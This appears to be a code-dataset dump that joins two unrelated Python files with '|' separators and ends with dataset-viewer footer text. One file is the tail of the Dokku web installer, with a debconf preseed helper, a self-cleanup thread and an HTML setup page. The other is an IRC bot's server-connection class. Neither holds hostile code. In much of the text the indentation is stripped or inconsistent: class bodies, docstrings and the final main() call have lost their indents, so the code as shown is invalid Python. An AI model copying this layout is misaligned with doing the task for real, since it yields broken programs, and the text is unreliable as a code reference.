                # User of the form `user` or `user#` exists
                exists = True
                max_num = max(max_num, int(m.group(1)))
        if exists:
            return max_num
        else:
            return None
def set_debconf_selection(debconf_type, key, value):
    """Preseed a `dokku dokku/<key>` debconf answer so later package
    reconfiguration keeps the values chosen in the web installer.

    Only acts on Debian-derived systems (detected via /etc/os-release);
    silently does nothing elsewhere or when debconf is unavailable.
    """
    # Robustness fix: the original open() leaked the handle and raised
    # IOError/OSError on systems without /etc/os-release.
    try:
        with open('/etc/os-release', 'r') as f:
            found = any('debian' in line for line in f)
    except (IOError, OSError):
        return
    if not found:
        return

    ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
        key, debconf_type, value
    )], stdout=subprocess.PIPE)
    try:
        subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
    except subprocess.CalledProcessError:
        # debconf refused the value; best-effort, keep going.
        pass
    ps.wait()
class DeleteInstallerThread(object):
    # Fire-and-forget self-destruct: in a daemon thread, remove the
    # installer's nginx config and init units, restart nginx, and stop
    # this service.

    def __init__(self, interval=1):
        # `interval` is unused; kept for backward compatibility.
        thread = threading.Thread(target=self.run, args=())
        thread.daemon = True
        thread.start()

    def run(self):
        # Drop the nginx proxy config and bounce nginx. Best-effort:
        # subprocess.call failures are ignored.
        command = "rm {0}/conf.d/dokku-installer.conf && {1} stop && {1} start".format(nginx_dir, nginx_init)
        try:
            subprocess.call(command, shell=True)
        except:
            pass
        # Remove the upstart/systemd units and stop the running service.
        command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
        try:
            subprocess.call(command, shell=True)
        except:
            pass
def main():
    """Entry point: handle `onboot` unit installation, then serve the
    installer UI until interrupted."""
    check_boot()
    port = int(os.getenv('PORT', 2000))
    httpd = SocketServer.TCPServer(("", port), GetHandler)
    print("Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port))
    httpd.serve_forever()
PAGE = """
<html>
<head>
<meta charset="utf-8" />
<title>Dokku Setup</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<style>
.bd-callout {
padding: 1.25rem;
margin-top: 1.25rem;
margin-bottom: 1.25rem;
border: 1px solid #eee;
border-left-width: .25rem;
border-radius: .25rem;
}
.bd-callout p:last-child {
margin-bottom: 0;
}
.bd-callout-info {
border-left-color: #5bc0de;
}
pre {
font-size: 80%;
margin-bottom: 0;
}
h1 small {
font-size: 50%;
}
h5 {
font-size: 1rem;
}
.container {
width: 640px;
}
.result {
padding-left: 20px;
}
input.form-control, textarea.form-control {
background-color: #fafbfc;
font-size: 14px;
}
input.form-control::placeholder, textarea.form-control::placeholder {
color: #adb2b8
}
</style>
</head>
<body>
<div class="container">
<form id="form" role="form">
<h1 class="pt-3">Dokku Setup <small class="text-muted">{VERSION}</small></h1>
<div class="alert alert-warning small" role="alert">
<strong>Warning:</strong> The SSH key filled out here can grant root access to the server. Please complete the setup as soon as possible.
</div>
<div class="row">
<div class="col">
<h3>Admin Access</h3>
<div class="form-group">
<label for="key">Public SSH Keys</label><br />
<textarea class="form-control" name="keys" rows="5" id="key" placeholder="Begins with 'ssh-rsa', 'ssh-dss', 'ssh-ed25519', 'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', or 'ecdsa-sha2-nistp521'">{ADMIN_KEYS}</textarea>
<small class="form-text text-muted">Public keys allow users to ssh onto the server as the <code>dokku</code> user, as well as remotely execute Dokku commands. They are currently auto-populated from: <code>{AUTHORIZED_KEYS_LOCATION}</code>, and can be changed later via the <a href="http://dokku.viewdocs.io/dokku/deployment/user-management/" target="_blank"><code>dokku ssh-keys</code></a> plugin.</small>
</div>
</div>
</div>
<div class="row">
<div class="col">
<h3>Hostname Configuration</h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" placeholder="A hostname or ip address such as {HOSTNAME}" />
<small class="form-text text-muted">This will be used as the default host for all applications, and can be changed later via the <a href="http://dokku.viewdocs.io/dokku/configuration/domains/" target="_blank"><code>dokku domains:set-global</code></a> command.</small>
</div>
<div class="form-check">
<input class="form-check-input" type="checkbox" id="vhost" name="vhost" value="true">
<label class="form-check-label" for="vhost">Use virtualhost naming for apps</label>
<small class="form-text text-muted">When enabled, Nginx will be run on port 80 and proxy requests to apps based on hostname.</small>
<small class="form-text text-muted">When disabled, a specific port will be setup for each application on first deploy, and requests to that port will be proxied to the relevant app.</small>
</div>
<div class="alert alert-warning small mt-3 d-{UFW_DISPLAY}" role="alert">
<strong>Warning:</strong> UFW is active. To allow traffic to specific ports, run <code>sudo ufw allow PORT</code> for the port in question.
</div>
<div class="bd-callout bd-callout-info">
<h5>What will app URLs look like?</h5>
<pre><code id="example">http://hostname:port</code></pre>
</div>
</div>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span class="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
var $ = document.querySelector.bind(document)
function setup() {
if ($("#key").value.trim() == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($("#hostname").value.trim() == "") {
alert("Your hostname cannot be blank.")
return
}
var data = new FormData($("#form"))
var inputs = [].slice.call(document.querySelectorAll("input, textarea, button"))
inputs.forEach(function (input) {
input.disabled = true
})
var result = $(".result")
fetch("/setup", {method: "POST", body: data})
.then(function(response) {
if (response.ok) {
return response.json()
} else {
throw new Error('Server returned error')
}
})
.then(function(response) {
result.classList.add("text-success");
result.textContent = "Success! Redirecting in 3 seconds. .."
setTimeout(function() {
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
}, 3000);
})
.catch(function (error) {
result.classList.add("text-danger");
result.textContent = "Could not send the request"
})
}
function update() {
if ($("#vhost").matches(":checked") && $("#hostname").value.match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").checked = false;
}
if ($("#vhost").matches(':checked')) {
$("#example").textContent = "http://<app-name>."+$("#hostname").value
} else {
$("#example").textContent = "http://"+$("#hostname").value+":<app-port>"
}
}
$("#vhost").addEventListener("change", update);
$("#hostname").addEventListener("input", update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
serverconnection.py | import socket
import time
from threading import Thread
from messageparser import MessageParser, ParsedMessage, MessageType
from channel import IrcChannel
from dynamicmodule import DynamicModule
# Source: http://blog.initprogram.com/2010/10/14/a-quick-basic-primer-on-the-irc-protocol/
class ServerConnection(object):
"""
Class handling irc servers.
"""
PING_INTERVAL_THRESHOLD = 300 # 300 seconds
def __init__(self, networkname, server_config, bot_config, joinlist, modules_config):
    # Lifecycle flags: alive gates all loops, connected is set elsewhere.
    self.alive = True
    self.connected = False
    # Server endpoint.
    self.hostname = server_config['hostname']
    self.port = int(server_config.get('port', "6667"))
    # Bot identity.
    self.nick = bot_config['nick']
    self.altnick = bot_config.get('altnick', self.nick + "_")
    self.username = bot_config['username']
    self.realname = bot_config['realname']
    self.owner = bot_config['owner']
    self.networkname = networkname
    # Channels to auto-join (presumably consumed by the MOTD handler —
    # TODO confirm against the rest of the class).
    self.joinlist = joinlist
    self._reader_thread = None
    self._parser = MessageParser()
    self._init_callback_table()
    self._socket = None
    self._channel_list = []
    self._modules_config = modules_config
    # One DynamicModule instance per configured module.
    self.dynamic_modules = [DynamicModule(self, m, c) for m, c in modules_config.items()]
    # Timestamp used by _check_ping_time for timeout detection.
    self._last_ping = time.time()
def _init_callback_table(self):
    # Maps each parsed MessageType to the bound handler method invoked by
    # _handle_messages.
    self._receive_callbacks = {
        MessageType.PRIVATE_MESSAGE: self._private_message_received,
        MessageType.JOIN: self._join_received,
        MessageType.PART: self._part_received,
        MessageType.PING: self._ping_received,
        MessageType.QUIT: self._quit_received,
        MessageType.TOPIC: self._topic_received,
        MessageType.END_OF_MOTD: self._motd_received,
        #MessageType.NICK_IN_USE: self.ni,
        MessageType.TOPIC_REPLY: self._topic_reply_received,
        MessageType.USERS: self._users_received,
        MessageType.END_OF_USERS: self._users_end_received,
        MessageType.CHANNEL_MESSAGE: self._channel_message_received,
        MessageType.UNKNOWN: self._unknown_message_received,
        MessageType.CTCP_TIME: self._ctcp_message_received,
        MessageType.CTCP_VERSION: self._ctcp_version_received,
        MessageType.CTCP_PING: self._ctcp_message_received,
        MessageType.CTCP_DCC: self._ctcp_message_received,
    }
def connect(self):
    """
    Starts the background reader thread that connects to the irc
    server and processes incoming data.
    """
    reader = Thread(target=self._connection_loop)
    self._reader_thread = reader
    reader.start()
def _connect(self):
    # Retry loop: attempt a TCP connection every 30 s until it succeeds
    # or the bot is shut down.
    while self.alive:
        try:
            # Drop any stale socket from a previous attempt.
            if self._socket:
                self._socket.close()
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._socket.connect((self.hostname, self.port))
            # Register with the server immediately after connecting.
            self.NICK(self.nick)
            self.USER(self.username, self.realname)
            self._last_ping = time.time()
            break
        except Exception as e:
            self._print_line(str(e) + " " + self.hostname)
            self._print_line("Trying again in 30 seconds.")
            self._sleep(30)
def _connection_loop(self):
    # Reader-thread main loop: reconnect whenever _read() returns
    # (connection lost or ping timeout) until the bot is killed.
    while self.alive:
        self._connect()
        self._read()
        if not self.alive:
            break
        self._print_line("Trying again in 60 seconds.")
        self._sleep(60)
def _write(self, message):
"""
Prints and writes message to server.
"""
self._print_line(message[:-1])
self._socket.send(bytearray(message, 'utf-8'))
def _check_ping_time(self):
    """Returns True while the most recent server PING is recent enough."""
    elapsed = time.time() - self._last_ping
    return elapsed < ServerConnection.PING_INTERVAL_THRESHOLD
def _read(self):
"""
Reads and handles messages.
"""
self._socket.settimeout(1.0)
buff = ""
while self.alive and self._check_ping_time():
try:
tmp = self._socket.recv(4096)
except socket.timeout as e:
continue
except socket.error as e:
self._print_line(str(e))
break
except KeyboardInterrupt:
self.kill()
return
if not self.alive:
break
if not tmp:
break
tmp = tmp.decode('utf-8')
buff += tmp
parsed_messages, remainder = self._parser.parse_buffer(buff)
buff = remainder
self._handle_messages(parsed_messages)
self._socket.close()
self._print_line("Connection closed.")
self.connected = False
def _handle_messages(self, messages):
"""
Handles a list of messages
"""
for message in messages:
self._receive_callbacks[message.type](**message.params)
def _print_line(self, message):
    """
    Prints message prefixed with a timestamp and the network name.
    """
    stamp = time.strftime("%H:%M:%S")
    print(f"{stamp} |{self.networkname}| {message}")
def NICK(self, nick):
    """
    Requests nick as the connection's nickname on the server.
    """
    self._write(f"NICK {nick}\r\n")
def USER(self, username, realname):
    """
    Registers username and realname with the server on connect.
    """
    self._write(f"USER {username} 0 * :{realname}\r\n")
def PONG(self, message):
    """
    Answers a server PING by echoing its token back.
    """
    self._write(f"PONG :{message}\r\n")
def JOIN(self, channel):
    """
    Asks the server to join channel.
    """
    self._write(f"JOIN :{channel}\r\n")
def PART(self, channel, reason=""):
    """
    Leaves channel, optionally announcing a reason.
    """
    suffix = f" :{reason}" if reason else ""
    self._write(f"PART {channel}{suffix}\r\n")
def PRIVMSG(self, target, message):
    """
    Sends message to target (a nick or a channel).
    """
    self._write(f"PRIVMSG {target} :{message}\r\n")
def PING(self, message):
    """
    Sends a PING with the given token to the server.
    """
    self._write(f"PING {message}\r\n")
def CTCP(self, target, message):
    """Sends a CTCP request: a PRIVMSG wrapped in \\x01 delimiters."""
    self.PRIVMSG(target, f"\x01{message}\x01")
def NOTICE(self, target, message):
    """Sends a NOTICE to target."""
    self._write(f"NOTICE {target} :{message}\r\n")
def _on_connect(self):
"""
Called when connected to the network.
"""
self.PING(self.hostname)
self._join_channels()
for dm in self.dynamic_modules:
try:
dm.instance.on_connect()
except Exception as e:
print(e)
def _join_channels(self):
"""
Joins channels specified in self.joinlist
"""
for channel in self.joinlist:
self.JOIN(channel)
def kill(self):
    """
    Flags the connection as dead and kills every loaded module.
    """
    self.alive = False
    for module in self.dynamic_modules:
        module.instance.kill()
def _private_message_received(self, **kw):
"""
Called when a private message has been received. Prints it
and calls on_private_message() on DynamicModule instances.
"""
source = kw['source']
message = kw['message']
full_mask = kw['full_mask']
self._print_line("PRIVATE" + " <" + source + "> " + message)
for dm in self.dynamic_modules:
try:
dm.instance.on_private_message(source, message, full_mask)
except Exception as e:
print(e)
def _channel_message_received(self, **kw):
"""
Called when a PRIVMSG to a channel has been received. Prints it
and calls on_channel_message() on DynamicModule instances.
"""
source = kw['source']
message = kw['message']
full_mask = kw['full_mask']
channel = kw['channel_name']
self._print_line(channel + " <" + source + "> " + message)
for dm in self.dynamic_modules:
try:
dm.instance.on_channel_message(source, channel, message, full_mask)
except Exception as e:
print(e)
def _ping_received(self, **kw):
"""
Called when PING message has been received.
"""
self._last_ping = time.time()
message = kw['message']
self.PONG(message)
def _motd_received(self, **kw):
"""
Called when the end of MOTD message
has been received.
"""
message = kw['message']
self._print_line(message)
if not self.connected:
self.connected = True
self._on_connect()
def _find_channel_by_name(self, channel_name):
"""
Returns a channel instance from channel_list
matching channel_name parameter or None.
"""
for channel in self._channel_list:
if channel.name == channel_name:
return channel
def _add_channel(self, name, user_list):
    """
    Registers a new IrcChannel in the network's channel list unless a
    channel with that name already exists.
    """
    if self._find_channel_by_name(name):
        return
    self._channel_list.append(IrcChannel(name, user_list))
def _users_received(self, **kw):
"""
Called when USERS message is received. Notifies
channel instance of the users.
"""
channel_name = kw['channel_name']
user_list = kw['user_list']
channel = self._find_channel_by_name(channel_name)
if not channel:
self._add_channel(channel_name, user_list)
return
channel.users_message(user_list)
def _users_end_received(self, **kw):
"""
Called when USERS message's end has been received.
Notifies the channel instance.
"""
channel_name = kw['channel_name']
channel = self._find_channel_by_name(channel_name)
if not channel:
# TODO FIX
self._print_line("REPORT THIS: usersEndReceived, channel not found")
return
channel.users_message_end()
self._print_line("USERS OF " + channel_name)
self._print_line(" ".join(channel.userlist))
def _quit_received(self, **kw):
"""
Called when a QUIT message has been received. Calls
on_quit() on DynamicModules
"""
nick = kw['nick']
full_mask = kw['full_mask']
for channel in self._channel_list:
channel.remove_user(nick)
self._print_line(nick + " has quit.")
for dm in self.dynamic_modules:
try:
dm.instance.on_quit(nick, full_mask)
except Exception as e:
print(e)
def _part_received(self, **kw):
"""
Called when a PART message has been received. Calls
on_part() on DynamicModules
"""
nick = kw['nick']
channel_name = kw['channel_name']
full_mask = kw['full_mask']
channel = self._find_channel_by_name(channel_name)
if not channel:
return
channel.remove_user(nick)
self._print_line(nick + " has parted " + channel_name)
for dm in self.dynamic_modules:
try:
dm.instance.on_part(nick, channel_name, full_mask)
except Exception as e:
print(e)
def _join_received(self, **kw):
"""
Called when a JOIN message has been received. Calls
on_join() on DynamicModules
"""
nick = kw['nick']
channel_name = kw['channel_name']
full_mask = kw['full_mask']
channel = self._find_channel_by_name(channel_name)
if channel:
channel.add_user(nick)
self._print_line(nick + " has joined " + channel_name)
for dm in self.dynamic_modules:
try:
dm.instance.on_join(nick, channel_name, full_mask)
except Exception as e:
print(e)
def _topic_received(self, **kw):
"""
Called when topic is changed on a channel. Calls on_topic()
on DynamicModules
"""
nick = kw['nick']
channel_name = kw['channel_name']
full_mask = kw['full_mask']
topic = kw['topic']
channel = self._find_channel_by_name(channel_name)
if channel:
channel.topic = topic
self._print_line(nick + " changed the topic of " + channel_name + " to: " + topic)
for dm in self.dynamic_modules:
try:
dm.instance.on_topic(nick, channel_name, topic, full_mask)
except Exception as e:
print(e)
def _topic_reply_received(self, **kw):
"""
Called when server responds to client's /topic or server informs
of the topic on joined channel.
"""
channel_name = kw['channel_name']
topic = kw['topic']
channel = self._find_channel_by_name(channel_name)
if channel:
channel.topic = topic
self._print_line("Topic in " + channel_name + ": " + topic)
def _ctcp_message_received(self, **kw):
self._print_line("CTCP: " + str(kw))
def _ctcp_version_received(self, **kw):
":juke!juke@jukk.is NOTICE irckaaja :VERSION ?l? hakkeroi!"
self.NOTICE(kw['source'], "\x01VERSION irckaaja 0.1.0\x01")
def _unknown_message_received(self, **kw):
self._print_line(kw['message'])
def _sleep(self, seconds):
"""
Sleeps for seconds unless not self.alive.
"""
start = time.time()
while time.time() < start + seconds and self.alive:
time.sleep(1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.